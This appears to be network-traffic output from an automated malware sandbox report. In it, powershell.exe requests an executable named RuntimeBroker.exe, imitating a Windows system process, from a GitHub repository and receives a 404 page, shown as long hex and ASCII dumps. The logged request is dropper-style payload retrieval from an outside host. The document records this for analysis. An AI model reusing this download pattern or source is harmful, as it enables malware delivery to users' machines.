                                                                                              2022-08-10 04:47:36 UTC238INData Raw: 33 30 78 38 46 66 63 54 69 64 31 6f 36 63 70 36 42 34 62 65 36 75 6a 41 44 2b 6c 6e 37 61 57 2f 38 41 4e 50 31 4c 6b 2f 34 62 4e 6e 32 54 33 45 34 6e 64 61 4f 6e 4a 36 42 34 66 65 36 75 6a 41 58 66 30 72 2f 51 50 38 76 37 74 2b 6f 41 4f 68 39 4f 77 6e 33 68 62 78 2b 34 75 33 6e 4c 73 64 50 54 6c 6e 50 32 42 73 4c 79 62 62 56 30 59 4a 2f 61 76 39 45 49 2f 77 42 37 2b 75 2f 2f 41 50 46 61 33 76 56 39 78 64 74 75 64 50 54 6e 71 54 30 42 73 64 39 71 36 4d 64 59 6a 2b 6c 58 36 4b 50 2f 41 44 62 31 77 54 70 39 4f 32 49 36 70 37 69 37 62 63 36 65 6e 50 55 65 67 4e 6a 76 74 58 52 6a 72 4a 66 2f 41 45 70 2f 54 76 38 41 4a 2b 38 2b 72 61 47 2f 69 39 47 30 7a 2f 79 77 74 61 66 33 46 32 6b 35 64 68 6a 74 5a 36 6d 4e 58 37 66 37 4f 38 6d 32 7a 32 63 64 61 59 2f 70 56
                                                                                              Data Ascii: 30x8FfcTid1o6cp6B4be6ujAD+ln7aW/8ANP1Lk/4bNn2T3E4ndaOnJ6B4fe6ujAXf0r/QP8v7t+oAOh9Own3hbx+4u3nLsdPTlnP2BsLybbV0YJ/av9EI/wB7+u//APFa3vV9xdtudPTnqT0Bsd9q6MdYj+lX6KP/ADb1wTp9O2I6p7i7bc6enPUegNjvtXRjrJf/AEp/Tv8AJ+8+raG/i9G0z/ywtaf3F2k5dhjtZ6mNX7f7O8m2z2cdaY/pV
                                                                                              2022-08-10 04:47:36 UTC239INData Raw: 2b 75 58 6f 77 42 39 78 57 39 50 33 4e 35 62 71 2f 58 30 2f 6a 31 4d 35 2b 33 50 4d 64 50 36 4f 72 38 4f 74 7a 6e 2b 56 50 35 6a 66 2f 77 42 48 2f 56 66 38 68 61 39 52 2b 58 62 2f 41 45 64 4b 65 6e 2f 4d 4e 7a 71 36 45 54 2f 4c 50 38 77 69 76 37 4c 2b 73 2f 37 6d 2f 77 43 78 62 2f 7a 33 6c 2b 2f 30 64 72 44 48 2b 44 34 2f 63 61 2b 7a 6c 47 2f 2b 58 50 33 36 30 34 6e 39 6b 2f 58 45 37 44 39 50 36 68 39 31 71 31 6a 7a 76 67 4d 2f 72 37 50 74 36 65 74 6e 50 6b 33 48 59 2f 51 32 6e 5a 31 64 54 6e 76 2f 41 47 44 39 38 74 44 33 66 73 33 36 36 30 62 6e 39 50 36 6f 2f 77 43 61 74 59 38 34 34 4c 50 4a 6a 62 37 50 74 36 65 74 6e 50 6c 50 47 34 35 39 6a 74 4f 78 71 36 6e 4f 66 32 62 39 33 59 6b 2f 74 58 36 77 41 56 50 30 50 55 2f 7a 56 72 2f 4b 63 4a 6e 6d 32 32 6a
                                                                                              Data Ascii: +uXowB9xW9P3N5bq/X0/j1M5+3PMdP6Or8Otzn+VP5jf/wBH/Vf8ha9R+Xb/AEdKen/MNzq6ET/LP8wiv7L+s/7m/wCxb/z3l+/0drDH+D4/ca+zlG/+XP3604n9k/XE7D9P6h91q1jzvgM/r7Pt6etnPk3HY/Q2nZ1dTnv/AGD98tD3fs3660bn9P6o/wCatY844LPJjb7Pt6etnPlPG459jtOxq6nOf2b93Yk/tX6wAVP0PU/zVr/KcJnm22j


                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                              3192.168.11.2049809140.82.121.4443C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              TimestampkBytes transferredDirectionData
                                                                                              2022-08-10 04:47:59 UTC241OUTGET /gowgerrie/reborn/raw/main/04/RuntimeBroker.exe HTTP/1.1
                                                                                              User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151
                                                                                              Host: github.com
                                                                                              Connection: Keep-Alive
                                                                                              2022-08-10 04:47:59 UTC241INHTTP/1.1 404 Not Found
                                                                                              Server: GitHub.com
                                                                                              Date: Wed, 10 Aug 2022 04:47:59 GMT
                                                                                              Content-Type: text/html; charset=utf-8
                                                                                              Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                              permissions-policy: interest-cohort=()
                                                                                              Cache-Control: no-cache
                                                                                              Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                              X-Frame-Options: deny
                                                                                              X-Content-Type-Options: nosniff
                                                                                              X-XSS-Protection: 0
                                                                                              Referrer-Policy: origin-when-cross-origin, strict-origin-when-cross-origin
                                                                                              Expect-CT: max-age=2592000, report-uri="https://api.github.com/_private/browser/errors"
                                                                                              2022-08-10 04:47:59 UTC241INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 62 6c 6f 63 6b 2d 61 6c 6c 2d 6d 69 78 65 64 2d 63 6f 6e 74 65 6e 74 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 6f 62 6a 65 63 74 73 2d 6f 72 69 67 69 6e 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e
                                                                                              Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; block-all-mixed-content; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com objects-origin.githubusercontent.com www.githubstatus.
                                                                                              2022-08-10 04:47:59 UTC243INData Raw: 46 30 41 35 0d 0a 0a 0a 0a 0a 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 61 74 61 2d 63 6f 6c 6f 72 2d 6d 6f 64 65 3d 22 61 75 74 6f 22 20 64 61 74 61 2d 6c 69 67 68 74 2d 74 68 65 6d 65 3d 22 6c 69 67 68 74 22 20 64 61 74 61 2d 64 61 72 6b 2d 74 68 65 6d 65 3d 22 64 61 72 6b 22 20 64 61 74 61 2d 61 31 31 79 2d 61 6e 69 6d 61 74 65 64 2d 69 6d 61 67 65 73 3d 22 73 79 73 74 65 6d 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 64 6e 73 2d 70 72 65 66 65 74 63 68 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 22 3e 0a 20
                                                                                              Data Ascii: F0A5<!DOCTYPE html><html lang="en" data-color-mode="auto" data-light-theme="light" data-dark-theme="dark" data-a11y-animated-images="system"> <head> <meta charset="utf-8"> <link rel="dns-prefetch" href="https://github.githubassets.com">
                                                                                              2022-08-10 04:47:59 UTC243INData Raw: 2e 73 33 2e 61 6d 61 7a 6f 6e 61 77 73 2e 63 6f 6d 22 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 64 6e 73 2d 70 72 65 66 65 74 63 68 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 75 73 65 72 2d 69 6d 61 67 65 73 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 2f 22 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 76 61 74 61 72 73 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 22 3e 0a 0a 0a 0a 20 20 3c 6c 69 6e
                                                                                              Data Ascii: .s3.amazonaws.com"> <link rel="dns-prefetch" href="https://user-images.githubusercontent.com/"> <link rel="preconnect" href="https://github.githubassets.com" crossorigin> <link rel="preconnect" href="https://avatars.githubusercontent.com"> <lin
                                                                                              2022-08-10 04:47:59 UTC245INData Raw: 3d 22 61 6c 6c 22 20 69 6e 74 65 67 72 69 74 79 3d 22 73 68 61 35 31 32 2d 55 52 50 53 76 69 43 77 34 6d 34 6e 37 31 49 4b 6e 34 71 79 75 37 4d 45 44 70 47 62 43 69 54 66 73 4d 54 4e 72 55 6a 50 77 63 67 33 38 4b 74 45 4b 44 74 31 32 76 7a 6a 6c 4e 7a 6f 79 33 59 44 46 69 51 38 44 30 54 43 43 59 4b 43 74 72 5a 70 71 58 30 39 37 67 3d 3d 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 64 61 74 61 2d 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 64 61 72 6b 5f 63 6f 6c 6f 72 62 6c 69 6e 64 2d 35 31 31 33 64 32 62 65 32 30 62 30 2e 63 73 73 22 20 2f 3e 3c 6c 69 6e 6b 20 64 61 74 61 2d 63 6f 6c 6f 72 2d 74 68 65 6d 65 3d 22 6c 69 67 68 74 5f 63 6f 6c 6f 72 62 6c
                                                                                              Data Ascii: ="all" integrity="sha512-URPSviCw4m4n71IKn4qyu7MEDpGbCiTfsMTNrUjPwcg38KtEKDt12vzjlNzoy3YDFiQ8D0TCCYKCtrZpqX097g==" rel="stylesheet" data-href="https://github.githubassets.com/assets/dark_colorblind-5113d2be20b0.css" /><link data-color-theme="light_colorbl
                                                                                              2022-08-10 04:47:59 UTC246INData Raw: 30 37 38 62 2e 63 73 73 22 20 2f 3e 0a 20 20 0a 20 20 20 20 3c 6c 69 6e 6b 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 69 6e 74 65 67 72 69 74 79 3d 22 73 68 61 35 31 32 2d 53 55 71 79 45 51 6f 71 69 79 62 46 34 54 47 64 4c 48 30 74 68 34 76 44 4c 39 49 39 45 46 47 54 58 66 63 74 68 39 43 49 56 41 6f 4e 65 51 4a 66 41 79 66 75 38 4d 74 6d 4f 4d 57 62 47 6e 71 50 36 56 78 46 49 51 36 56 64 44 48 78 68 64 58 4e 47 31 6b 2f 2f 51 3d 3d 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 70 72 69 6d 65 72 2d 34 39 34 61 62 32 31 31 30 61 32 61 2e 63 73 73
                                                                                              Data Ascii: 078b.css" /> <link crossorigin="anonymous" media="all" integrity="sha512-SUqyEQoqiybF4TGdLH0th4vDL9I9EFGTXfcth9CIVAoNeQJfAyfu8MtmOMWbGnqP6VxFIQ6VdDHxhdXNG1k//Q==" rel="stylesheet" href="https://github.githubassets.com/assets/primer-494ab2110a2a.css
                                                                                              2022-08-10 04:47:59 UTC248INData Raw: 5a 56 72 62 4e 66 73 55 55 5a 52 70 30 61 32 52 43 5a 4e 59 72 46 4a 59 46 6c 59 68 64 44 55 32 50 2b 55 43 38 61 78 67 56 54 31 37 6f 71 76 31 42 56 51 4c 6e 67 53 73 47 6f 69 42 4e 32 4d 4a 70 77 3d 3d 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 6d 61 6e 75 65 6c 70 75 79 6f 6c 5f 74 75 72 62 6f 5f 64 69 73 74 5f 74 75 72 62 6f 5f 65 73 32 30 31 37 2d 65 73 6d 5f 6a 73 2d 38 61 66 39 62 61 65 66 61 62 39 65 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65
                                                                                              Data Ascii: ZVrbNfsUUZRp0a2RCZNYrFJYFlYhdDU2P+UC8axgVT17oqv1BVQLngSsGoiBN2MJpw==" src="https://github.githubassets.com/assets/vendors-node_modules_manuelpuyol_turbo_dist_turbo_es2017-esm_js-8af9baefab9e.js"></script><script crossorigin="anonymous" defer="defer" type
                                                                                              2022-08-10 04:47:59 UTC249INData Raw: 6e 64 6f 72 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 64 65 6c 65 67 61 74 65 64 2d 65 76 65 6e 74 73 5f 64 69 73 74 5f 69 6e 64 65 78 5f 6a 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 64 65 74 61 69 6c 73 2d 64 69 61 6c 6f 67 2d 65 6c 65 6d 65 6e 2d 36 33 64 65 62 65 2d 34 61 32 66 33 37 66 37 34 31 39 65 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 69 6e 74 65 67 72 69 74 79 3d 22 73 68 61 35 31 32 2d 49 57 33 4a 73 65 4f 30 6d 30 79 63 6c 69 78 73 78 44 77 75 58 42 6c 41 70 30 2b 62 58 56 5a 6b 41 7a 63
                                                                                              Data Ascii: ndors-node_modules_delegated-events_dist_index_js-node_modules_github_details-dialog-elemen-63debe-4a2f37f7419e.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" integrity="sha512-IW3JseO0m0yclixsxDwuXBlAp0+bXVZkAzc
                                                                                              2022-08-10 04:47:59 UTC250INData Raw: 51 3d 3d 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 66 69 6c 65 2d 61 74 74 61 63 68 6d 65 6e 74 2d 65 6c 65 6d 65 6e 74 5f 64 69 73 74 5f 69 6e 64 65 78 5f 6a 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 70 72 69 6d 65 72 5f 76 69 65 77 2d 63 6f 2d 62 33 64 33 32 66 2d 63 32 35 31 39 65 32 30 65 35 62 39 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 69 6e
                                                                                              Data Ascii: Q==" src="https://github.githubassets.com/assets/vendors-node_modules_github_file-attachment-element_dist_index_js-node_modules_primer_view-co-b3d32f-c2519e20e5b9.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" in
                                                                                              2022-08-10 04:47:59 UTC252INData Raw: 74 3e 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 69 6e 74 65 67 72 69 74 79 3d 22 73 68 61 35 31 32 2d 59 6c 5a 7a 66 44 73 30 73 4a 77 62 34 4c 44 50 6f 59 47 7a 70 70 61 61 73 47 2f 79 76 59 38 44 6f 6c 56 6b 36 34 75 37 4b 6a 70 79 7a 2f 4e 70 4b 53 33 45 37 74 6f 42 6b 48 63 44 78 4e 53 42 38 78 37 6d 6c 44 44 6a 43 32 6e 48 75 57 69 6c 74 73 4d 47 76 51 3d 3d 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 67 69 74
                                                                                              Data Ascii: t><script crossorigin="anonymous" defer="defer" type="application/javascript" integrity="sha512-YlZzfDs0sJwb4LDPoYGzppaasG/yvY8DolVk64u7Kjpyz/NpKS3E7toBkHcDxNSB8x7mlDDjC2nHuWiltsMGvQ==" src="https://github.githubassets.com/assets/vendors-node_modules_git
                                                                                              2022-08-10 04:47:59 UTC253INData Raw: 74 3e 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 69 6e 74 65 67 72 69 74 79 3d 22 73 68 61 35 31 32 2d 4d 55 71 6c 6c 55 31 7a 57 53 63 4a 72 47 34 34 75 68 50 69 4b 38 69 72 69 72 30 6e 77 36 53 65 70 47 76 70 2b 72 77 6a 52 51 52 6e 4c 6e 4b 54 6c 49 67 61 43 4f 31 4e 37 4f 45 5a 33 58 53 71 48 49 4a 79 4e 6e 5a 52 31 55 6c 41 32 39 6c 42 5a 72 71 78 53 77 3d 3d 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 61 70 70 5f 61 73 73 65 74 73 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75
                                                                                              Data Ascii: t><script crossorigin="anonymous" defer="defer" type="application/javascript" integrity="sha512-MUqllU1zWScJrG44uhPiK8irir0nw6SepGvp+rwjRQRnLnKTlIgaCO1N7OEZ3XSqHIJyNnZR1UlA29lBZrqxSw==" src="https://github.githubassets.com/assets/app_assets_modules_githu
                                                                                              2022-08-10 04:47:59 UTC254INData Raw: 65 73 5f 67 69 74 68 75 62 5f 62 65 68 61 76 69 6f 72 73 5f 68 74 2d 38 33 63 32 33 35 2d 64 62 37 39 35 39 62 35 66 66 66 39 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 69 6e 74 65 67 72 69 74 79 3d 22 73 68 61 35 31 32 2d 75 4e 66 37 63 49 5a 6a 6b 30 6f 52 65 31 71 46 6e 7a 56 50 31 65 46 72 6d 68 51 4b 71 36 31 41 51 70 77 4e 66 67 4d 62 6c 46 4b 47 4e 36 56 4e 7a 69 7a 77 6a 32 55 31 64 78 48 78 66 76 77 7a 75 2f 43 6d 2f 71 65 4b 6b 75 32 4d 75 6a 45 2f 61 75 4c 64 36 67 3d 3d 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67
                                                                                              Data Ascii: es_github_behaviors_ht-83c235-db7959b5fff9.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" integrity="sha512-uNf7cIZjk0oRe1qFnzVP1eFrmhQKq61AQpwNfgMblFKGN6VNzizwj2U1dxHxfvwzu/Cm/qeKku2MujE/auLd6g==" src="https://g
                                                                                              2022-08-10 04:47:59 UTC256INData Raw: 44 64 47 49 69 77 69 64 6d 6c 7a 61 58 52 76 63 6c 39 70 5a 43 49 36 49 6a 67 77 4f 54 6b 33 4f 54 59 33 4d 6a 49 31 4f 54 45 32 4e 7a 59 31 4e 44 4d 69 4c 43 4a 79 5a 57 64 70 62 32 35 66 5a 57 52 6e 5a 53 49 36 49 6d 5a 79 59 53 49 73 49 6e 4a 6c 5a 32 6c 76 62 6c 39 79 5a 57 35 6b 5a 58 49 69 4f 69 4a 70 59 57 51 69 66 51 3d 3d 22 20 64 61 74 61 2d 70 6a 61 78 2d 74 72 61 6e 73 69 65 6e 74 3d 22 74 72 75 65 22 20 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 73 69 74 6f 72 2d 68 6d 61 63 22 20 63 6f 6e 74 65 6e 74 3d 22 38 30 30 65 30 34 33 39 65 35 66 32 62 35 30 34 66 37 33 63 63 30 39 34 63 66 31 35 37 65 39 32 62 37 37 33 33 64 35 31 61 30 64 37 31 33 32 31 65 31 37 33 61 66 65 64 64 32 30 63 31 35 38 61 22 20 64 61 74 61 2d 70 6a 61 78 2d 74 72
                                                                                              Data Ascii: DdGIiwidmlzaXRvcl9pZCI6IjgwOTk3OTY3MjI1OTE2NzY1NDMiLCJyZWdpb25fZWRnZSI6ImZyYSIsInJlZ2lvbl9yZW5kZXIiOiJpYWQifQ==" data-pjax-transient="true" /><meta name="visitor-hmac" content="800e0439e5f2b504f73cc094cf157e92b7733d51a0d71321e173afedd20c158a" data-pjax-tr
                                                                                              2022-08-10 04:47:59 UTC257INData Raw: 69 64 2d 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 66 6c 75 69 64 69 63 6f 6e 2e 70 6e 67 22 20 74 69 74 6c 65 3d 22 47 69 74 48 75 62 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 66 62 3a 61 70 70 5f 69 64 22 20 63 6f 6e 74 65 6e 74 3d 22 31 34 30 31 34 38 38 36 39 33 34 33 36 35 32 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 70 70 6c 65 2d 69 74 75 6e 65 73 2d 61 70 70 22 20 63 6f 6e 74 65 6e 74 3d 22 61 70 70 2d 69 64 3d 31 34 37 37 33 37 36 39 30 35 22 20 2f 3e 0a 20 20 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 75 72 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 22 3e 0a 20 20 20 20 20 20
                                                                                              Data Ascii: id-icon" href="https://github.com/fluidicon.png" title="GitHub"> <meta property="fb:app_id" content="1401488693436528"> <meta name="apple-itunes-app" content="app-id=1477376905" /> <meta property="og:url" content="https://github.com">
                                                                                              2022-08-10 04:47:59 UTC258INData Raw: 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 69 6d 61 67 65 3a 68 65 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 36 32 30 22 3e 0a 0a 20 20 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 74 77 69 74 74 65 72 3a 73 69 74 65 22 20 63 6f 6e 74 65 6e 74 3d 22 67 69 74 68 75 62 22 3e 0a 20 20 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 74 77 69 74 74 65 72 3a 73 69 74 65 3a 69 64 22 20 63 6f 6e 74 65 6e 74 3d 22 31 33 33 33 34 37 36 32 22 3e 0a 20 20 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 74 77 69 74 74 65 72 3a 63 72 65 61 74 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 67 69 74 68 75 62 22 3e 0a 20 20 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 74 77 69 74 74 65 72 3a 63 72
                                                                                              Data Ascii: <meta property="og:image:height" content="620"> <meta property="twitter:site" content="github"> <meta property="twitter:site:id" content="13334762"> <meta property="twitter:creator" content="github"> <meta property="twitter:cr
                                                                                              2022-08-10 04:47:59 UTC260INData Raw: 22 20 64 61 74 61 2d 74 75 72 62 6f 2d 74 72 61 63 6b 3d 22 72 65 6c 6f 61 64 22 3e 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 78 2d 70 6a 61 78 2d 63 73 73 2d 76 65 72 73 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 30 32 30 65 35 30 34 30 64 66 64 62 62 33 36 36 30 36 65 62 64 63 65 65 35 62 34 31 32 62 31 39 63 64 37 66 30 39 36 36 39 33 64 65 30 64 31 33 63 66 61 39 36 39 32 39 36 38 36 66 33 65 32 63 22 20 64 61 74 61 2d 74 75 72 62 6f 2d 74 72 61 63 6b 3d 22 72 65 6c 6f 61 64 22 3e 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 78 2d 70 6a 61 78 2d 6a 73 2d 76 65 72 73 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 31 39 34 63 64 34 63 34 62 34 63 38 32 36 66 38 65 63 31 35 30 31 37 36 37 31 34 34 38 34 64 33 38 32 33 31
                                                                                              Data Ascii: " data-turbo-track="reload"> <meta http-equiv="x-pjax-css-version" content="020e5040dfdbb36606ebdcee5b412b19cd7f096693de0d13cfa96929686f3e2c" data-turbo-track="reload"> <meta http-equiv="x-pjax-js-version" content="194cd4c4b4c826f8ec150176714484d38231
                                                                                              2022-08-10 04:47:59 UTC261INData Raw: 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 66 61 76 69 63 6f 6e 73 2f 66 61 76 69 63 6f 6e 2e 70 6e 67 22 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 63 6c 61 73 73 3d 22 6a 73 2d 73 69 74 65 2d 66 61 76 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 73 76 67 2b 78 6d 6c 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 66 61 76 69 63 6f 6e 73 2f 66 61 76 69 63 6f 6e 2e 73 76 67 22 3e 0a 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 65 32 33 32 37 22 3e 0a 3c 6d 65 74 61 20 6e 61
                                                                                              Data Ascii: ype="image/png" href="https://github.githubassets.com/favicons/favicon.png"> <link rel="icon" class="js-site-favicon" type="image/svg+xml" href="https://github.githubassets.com/favicons/favicon.svg"><meta name="theme-color" content="#1e2327"><meta na
                                                                                              2022-08-10 04:47:59 UTC262INData Raw: 31 37 32 33 31 61 39 38 35 32 35 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 69 6e 74 65 67 72 69 74 79 3d 22 73 68 61 35 31 32 2d 43 65 6a 57 4e 31 77 2f 51 6a 62 4f 47 35 45 48 31 66 68 4e 79 50 6b 50 70 67 34 6e 49 6e 6e 70 72 54 41 4c 47 45 61 6f 78 39 45 6c 75 31 62 63 57 32 7a 45 6f 58 2b 66 45 4c 43 5a 41 42 52 65 34 2f 63 6d 76 2b 36 54 6e 61 2f 35 4f 49 70 78 73 58 64 36 2b 41 3d 3d 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 